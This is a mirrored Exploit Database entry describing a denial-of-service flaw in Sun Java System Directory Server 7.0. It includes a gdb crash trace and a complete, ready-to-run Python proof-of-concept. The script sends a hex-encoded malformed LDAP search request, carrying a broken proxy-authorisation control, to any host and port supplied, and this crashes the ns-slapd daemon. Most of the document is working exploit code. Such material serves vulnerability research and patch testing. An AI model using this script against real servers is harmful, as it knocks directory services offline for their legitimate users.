Sun Java System Directory Server 7.0 – ‘core_get_proxyauth_dn’ Denial of Service

• Exploit Database
• 121 阅读

• 作者： Intevydis
  日期： 2010-01-10
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33483/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  source: https://www.securityfocus.com/bid/37699/info   Sun Java System Directory Server is prone to a denial-of-service vulnerability.   An attacker can exploit this issue to crash the effected application, denying service to legitimate users.   Directory Server 7.0 is vulnerable; other versions may also be affected.   #!/usr/bin/env python # sun_dsee7.py # # Use this code at your own risk. Never run it against a production system. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.   import socket import sys   """ Sun Directory Server 7.0 core_get_proxyauth_dn() DoS (null ptr dereference) Tested on SUSE Linux Enterprise Server 11   # dsadm -V [dsadm] dsadm : 7.0B2009.1104.2350 ZIP   Copyright 2009 Sun Microsystems, Inc. All Rights Reserved. SUN PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.   [slapd 32-bit] Sun Microsystems, Inc. Sun-Directory-Server/7.0 B2009.1104.2350 32-bit ns-slapd: 7.0B2009.1104.2350 ZIP Slapd Library : 7.0B2009.1104.2350 Front-End Library : 7.0B2009.1104.2350   This simple proof of concept code will crash ns-slapd daemon:   Attaching to process 10204 Reading symbols from /opt/sun/dsee7/lib/ns-slapd...(no debugging symbols found)...done. Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done. ... Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xb1b47b90 (LWP 10233)] 0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so (gdb) bt #00xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so #10xb7ff30d3 in common_core_set_pb () from /opt/sun/dsee7/lib/libslapd.so #20xb7f1c7eb in search_core_set_pb () from /opt/sun/dsee7/lib/libfe.so #30xb7f2667f in ldap_decode_search () from /opt/sun/dsee7/lib/libfe.so #40xb7f27993 in ldap_parse_request () from /opt/sun/dsee7/lib/libfe.so #50xb7f147a4 in process_ldap_operation_using_core_api () from /opt/sun/dsee7/lib/libfe.so #60xb7f149ba in ldap_frontend_main_using_core_api () from /opt/sun/dsee7/lib/libfe.so #70xb7f153e3 in generic_workerthreadmain () from /opt/sun/dsee7/lib/libfe.so #80xb7eec89e in _pt_root () from /opt/sun/dsee7/lib/../lib/private/libnspr4.so #90xb80481b5 in start_thread () from /lib/libpthread.so.0 #10 0xb7ccb3be in clone () from /lib/libc.so.6 (gdb) x/i $eip 0xb80098c4 : cmpb $0x4,(%eax) (gdb) i r eax eax0x0 0 (gdb)   """   def send_req(host,port): """ LDAP Message, Search Request Message Id: 1 Message Type: Search Request (0x03) Message Length: 270 Base DN: (null) Scope: Subtree (0x02) Dereference: Never (0x00) Size Limit: 0 Time Limit: 0 Attributes Only: False Filter: (objectClass=*) Attribute: (null) LDAP Controls LDAP Control Control OID: 2.16.840.1.113730.3.4.18 Control Critical: True ERROR: Couldn&apos;t parse LDAP Control: Wrong type for that item """   reqdump=""" 30 82 01 15 02 01 01 63 82 01 0e 04 00 0a 01 02 0a 01 00 02 01 00 02 01 00 01 01 00 87 0b 6f 62 6a 65 63 74 43 6c 61 73 73 30 02 04 00 a0 81 e9 30 81 e6 04 18 32 2e 31 36 2e 38 34 30 2e 31 2e 31 31 33 37 33 30 2e 33 2e 34 2e 31 38 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 00 04 00 """   buf = "" for i in filter(lambda x: len(x.strip())>0, reqdump.split(" ")): buf+=chr(int(i,16))   print "Sending req to %s:%d" % (host,port)   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host,port)) sock.sendall(buf) sock.close()   print "Done"   if __name__=="__main__": if len(sys.argv)<3: print "usage: %s host port" % sys.argv[0] sys.exit()   send_req(sys.argv[1],int(sys.argv[2]))